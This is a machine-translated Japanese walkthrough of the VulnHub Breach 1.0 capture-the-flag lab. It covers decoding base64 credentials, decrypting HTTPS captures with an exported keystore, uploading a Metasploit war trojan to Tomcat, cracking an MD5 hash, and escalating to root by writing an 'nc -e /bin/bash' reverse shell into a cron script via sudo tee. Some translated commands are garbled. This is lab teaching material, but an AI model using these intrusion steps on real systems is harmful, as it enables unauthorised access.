Vulnhub射撃場 Breach1.0の詳細説明

目次

1.対象マシン情報

2. 環境構築

3. 潜入開始

1. 情報収集

2. ウェブの浸透 

2.1ベースデコード

2.2 impresscms へのログイン

 2.3 Java 環境を使用してキーストア証明書をエクスポートする

2.4Wireshark 解析 HTTP

2.5 BP プロキシはブロックしている Web サイトをバイパスします

3. 権利のエスカレーション

3.1 MSF リバウンドシェル

3.2 基本情報を見る 

3.3 脆弱性の発見（指紋認証）

3.4 mysqlへのログイン

 3.5 MD5 復号化衝突ミルトン ユーザー パスワード

 3.6 ステガノグラフィーを使用した blumbergh ユーザー パスワードの解読

 3.8 最終フラグの取得

4. まとめ

---

1.対象マシン情報

ターゲットマシンアドレス

侵害: 1 ~ VulnHub

 

2. 環境構築

win10 物理マシンには BP Wireshark をインストールする必要があります

Kali デュアル ネットワーク カード NAT 192.168.184.xxx (閉じることもできます。削除したくないのでそのままにします) ホストのみ: 192.168.110.xx

実際、単一のネットワーク カードも可能です (ホストのみである必要があります)。

侵害対象マシンのみのホスト 192.168.110.140

ping を実行して確認する

win10物理マシンping192.168.110.140 

192,168,110,140回

Kali ping 192.168.184.135 は ping できず、ホスト モードのみが同じネットワーク セグメント上にありません。

 

Breach 1.0 範囲は静的 IP 192.168.110.140 で構成されています 

3. 潜入開始

1. 情報収集

ホストは、ターゲット マシン 192.168.110.140 である必要がないことを発見しました。

ポートスキャン

nmap -T4 -A -v 192.168.110.140 

スキャンにより、すべてのポートが開いていることがわかりました。明らかに、ポート保護が設定されており、手動でのみ検出できます。

ポート 80 が優先されます

翻訳をチェックしてください。おそらくシャオパンは会社に不満を持っていて、会社を辞めるときに彼に贈り物をしました。これは本当の罰です! ぽっちゃり！ 

 習慣的な F12 ビューのソース コード

 文字化けの文字列が見つかりました。何らかの暗号化が行われているはずです。

<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

 ぽっちゃり画像をクリックするとここにジャンプします。

ホームページ ホームページが再びシャオパンに戻りました 

 このケーキケーキの写真では、シャオパンだけが食べるケーキを持っていません。

 ホッチキスホッチキス

従業員ポータル 従業員ポータル、ほぼ当社のOAシステムに相当します。 

CMS インターフェースを使用します。

2. ウェブの浸透 

2.1ベースデコード

まずは64ビット文字化けから見ていきましょう。。。 

Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo
发现64位  应该是base64
MD5：32位 内容：0-9 A-F

 ベースデコード、Webサイトも可能です。

 一度デコードしてみる

 ギボンをゲット   :くそーな気分$グッドトゥビーガン$タ 

ログインしてみて、正常にログインできます。！！

2.2 impresscms へのログイン

検出を保存するためのプロンプトを送信します 

ディレクトリは漏洩しましたが、役に立ちません。

 クリックして未読メールを開きます、3

翻訳してください 

最初のものはほとんど役に立ちません。

2つ目はIDS/IPS侵入検知・防御システム

  

3番目のメールのみが機能するようです

192.168.110.140/.keystore にアクセスして、ダウンロード ファイルを入手します。

 

 Baiduはキーストアを調べましたが、今のところ方法はありません。

キーストアは秘密キーを保存するパッケージと考えることができ、パッケージから秘密キーを取得するには正しいパスワードを指定する必要があります。 

SSL 証明書はキーストアに保存することもできますが、SSL 証明書を取得するにはパスワードを見つける必要があります。

SSL は、ID 認証とデータの暗号化と復号化のために HTTP プロトコル (HTTPS) を暗号化します。正しい SSL 証明書がなければ、http データ パケットの内容を解読することはできません。

 ホーム ホーム SSL で見つかったコンテンツはクリック可能です

 http 接続が表示され、クリックすると自動的にダウンロードされます。キーとパスワードは両方ともTomcatです

Baidu は、pcap ファイルを開くために何を使用すればよいかを検索したところ、パケットのキャプチャに Wireshark が使用されていることがわかりました。 

 2.3 Java 環境を使用してキーストア証明書をエクスポートする

 Win では Java 環境が必要ですが、そうでない場合は、kali に直接アクセスしてください (手順は同じです)。

(Win は Java に付属の keytool ツールを使用して、jdk の bin ディレクトリにあるキーストアをエクスポートします)

keytool -list -keystore keystore  #查看keystore密钥里面所有的证书

キーとパスワードは両方ともTomcatです 

 輸出証明書

keytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcat

-importkeystore 导出keystore

-srckeystore  源keystore文件

-destkeystore  导出之后的证书存放路径

-deststoretype  导出keystore之后的证书类型

-srcalias 源alias

パスワード パスワード Tomcat 

エクスポートは成功しましたが、kiss.p12というのは名前を変更したためで、tomcatkeystore.p12だとWiresharkが認識しないのではないかと心配です。

2.4Wireshark 解析 HTTP

[編集] --> [設定] --> [プロトコル] --> [SSL/TLS] (SSL (古いバージョン) がない場合は、[TLS (新しいバージョン)] を選択します) --> [編集] をクリックします。 

 _SSL_test_phase1.pcap をもう一度開くと、http データ パケットが出てきました。

 フレーム: 物理層のデータ フレームの概要。
Ethernet II: データリンク層の Ethernet フレームヘッダー情報。
インターネット プロトコル バージョン 4: インターネット層の IP パケット ヘッダー情報。
伝送制御プロトコル: トランスポート層のデータ セグメント ヘッダー情報。ここでは TCP プロトコルです。
ユーザー データグラム プロトコル: UDP プロトコル
ハイパーテキスト転送プロトコル: アプリケーション層情報、これは HTTP プロトコルです
トランスポート層セキュリティ セキュア トランスポート プロトコル、SSL

HTTPパケットのステータスを表示する

Tomcat は Basic で認証され、 Tomcat はWireshark で自動的に復号化されることがわかります: Tt\5D8F(#!*u=G)4m7zB

2.5 BP プロキシはブロックしている Web サイトをバイパスします

https://192.168.110.140:8443/_M@nag3Me/html にアクセスしてください。 

証明書を開くことができず、証明書がブラウザのセキュリティ メカニズムによって傍受される可能性があることが判明しました。

 BP プロキシを使用する (ブラウザとサーバーの間のミドルウェアとしての BP)

 BP はモニタリング エージェントを起動し、パケットをキャプチャして転送します。 

 リスクを受け入れて先に進みましょう。

 パケットをキャプチャし、パケットを解放し、Tomcat にログインします: Tt\5D8F(#!*u=G)4m7zB

 無事入力されました！！！ 

 ps: 説明すると、BP やブラウザの設定はすべて正常に設定されていますが、パケットをキャプチャするときに不可解なポートが表示され、ドメイン名も不明です。

その理由は、awvs や xray との連携スキャンに一般的に使用される burpsuite のユーザー オプションで上流システム プロキシが設定されているかどうかです。ここで閉じないと、次回パケットをキャプチャするときにパケットのキャプチャに失敗します。

バックグラウンドを確認すると、ファイルがアップロードされていることがわかりますが、時間制限があり、大きな馬や小さな馬をアップロードする場合、Ant Sword の接続が失われる可能性があり、継続的なアップロード接続が必要です。

 

 そこで、MSF を使用してシェルを反転します。

3. 権利のエスカレーション

3.1 MSF リバウンドシェル

MSF がトロイの木馬 tomcat.war を生成

ポート 4444 でリッスンする

トロイの木馬をアップロードする

ここからが重要なポイントですが、動作は速く、姿勢は美しくなければなりません。

バッグをつかんで、バッグを置きます。重要なことは速いです！！！

 シェルをリバウンドすると接続が成功します。

3.2 基本情報を見る 

 

Linux で通常の権限を持つユーザーはどのようにして root 権限に昇格しますか? ? ?

情報の収集 履歴 ls -a find sudo -l (現在のユーザーが sudo で実行できるコマンドを表示)

sudo 権限昇格 (ユーザーの切り替え)

カーネルの脆弱性 (システムのバージョンの脆弱性による)

SUID (プログラム ファイルの所有者。ただし、SUID 権限の設定はバイナリ実行可能ファイルのみに適用されます)

crontab (スケジュール)

su コマンドが使用できない、Python でコマンドラインを解決する

python -c 'ptyをインポートします。pty.spawn("/bin/bash")'

ユーザー cat /etc/passwd を表示

3.3 脆弱性の発見（指紋認証）

 カーネルの脆弱性の検索

searchsploit 14.04 Ubuntu

 既存の抜け穴はないようです

指紋認証http://192.168.110.140/impresscms/

whatweb -v http://192.168.110.140/impresscms/  

 この PHP Web サイトは Apache でデプロイされています。

Apache のデフォルトのサイト ディレクトリ /var/www/html

/var/www/html と入力します。5446 と HTML ファイルを参照してください。

5446 のコンテンツを見る

Enter を押して、mysql アカウントが root であり、パスワードが空白であることを確認します。

3.4 mysqlへのログイン

ビューテーブル 

テーブルを表示

 

select user,password from user;   #查看user，password，表

 3.5 MD5 復号化衝突ミルトン ユーザー パスワード

milton   6450d89bd3aff1d893b85d3ad65d2ec2

MDS 单向加密 不可逆 无法从密文解密到明文 
破解 强碰撞 

MD5 無料オンライン復号化クラック_MD5 オンライン暗号化-SOMD5

アカウント ミルトン パスワード thelaststraw

su blumbergh blumbergh ユーザーに切り替えたところ、パスワードがあることがわかりました。

 3.6 ステガノグラフィーを使用した blumbergh ユーザー パスワードの解読

/image に移動します

 

 ステガノグラフィー

ボスの写真に直接移動します

wget を kali にダウンロード

文字列は bill.png を復号化します

コーヒーの染みだけがパスワードのようなものだと判明

アカウント blumbergh パスワード コーヒーステイン

/usr/bin/tee/tidyup.sh が見つかりました

Crontab タイミング タスク + root 権限

tee を使用して tinyup.sh の内容を変更し、悪意のあるコマンドを追加します

tinyup.sh は 3 分ごとに実行されます。tidyup.sh ファイルは root のみが書き込み可能であり、tee コマンドは root 権限で実行できます。

3.7 teeを使用してtidyup.shを変更し、リバウンドしてroot権限を取得する

echo "nc -e /bin/bash 192.168.110.130 5555" > shell.txt  #nc反弹命令

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh #使用tee命令将shell.txt内容输出到tidyup.sh

cat /usr/share/cleanup/tidyup.sh   #查看tidyup.sh文件是否写入成功

nc -lvvp 5555 の監視をオンにして、root 権限を正常に取得します。！！

 3.8 最終フラグの取得

cp /root/flair.jpg /var/www/html/images   #复制flair.ipg到/images目录下

/images を開き、ファイル flair.jpg を見つけます。

 フラグを取得するにはアクセスしてください

4. まとめ

この射撃場は本当に総合的で、さまざまなピットがあります。。。

偉大な老馬はかつてこう言いました、「道は曲がりくねっているが、未来は明るい」

インターネットセキュリティを学んだあとは

「紆余曲折を乗り越えられないけど、明るい未来は見えない」

ハハハ、要約すると

1.ターゲット マシンの正式な設定は 192.168.110.140 であり、ポート スキャンを保護する必要があります。

2.ポート80 、F12 から開始してソース コードを表示し、 base64 エンコーディングを見つけます。

<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

Base64 を 2 回復号化して、pgibbons:damnitfeelta を取得してimpresscmsにログインします

3. ディレクトリが漏洩し、電子メール情報が検出され、キーストアがダウンロードされ、Java 環境 (kali には jdk が付属)を使用してSSL 証明書がエクスポートされ、証明書がインポートされます。

Wireshark で HTTP パケットを復号し、Tomcat を自動的に復号します: Tt\5D8F(#!*u=G)4m7zB https://192.168.110.140:8443/_M@nag3Me/htmlにアクセスしてください

BPはセキュリティ傍受を回避するためにプロキシを開き、 MSFリバウンド.warトロイの木馬をアップロードし、すべてのユーザーをチェックしました。不審なユーザーであるミルトンとブルンバーグは、apache/のデフォルトディレクトリをチェックすることでmysql（root権限）のアカウントパスワード（空）を取得しました。 var/www/ 。

4. mysql にログインし、テーブルを復号化して Milton の MD5 6450d89bd3aff1d893b85d3ad65d2ec2 を取得します。

アカウント ミルトン パスワード thelaststraw

5. milton ユーザーとしてログインし、カーネルの脆弱性を確認します。悪用可能な脆弱性はありません。sudo blumberghに対する履歴履歴コマンドを確認します。

6. /images ディレクトリにあるイメージ ステガノグラフィー技術によって blumbergh のパスワード Coffeestains を取得し、blumbergh ユーザーにログインします。

sudo-lでtee tinyup.shを表示し、tee を使用して Tidyup.sh を変更し、リバウンドして root 権限を取得し、 flair.jpg を表示し、 flair.ipg を /images ディレクトリにコピーし、その /images にアクセスして、フラグ イメージを取得します。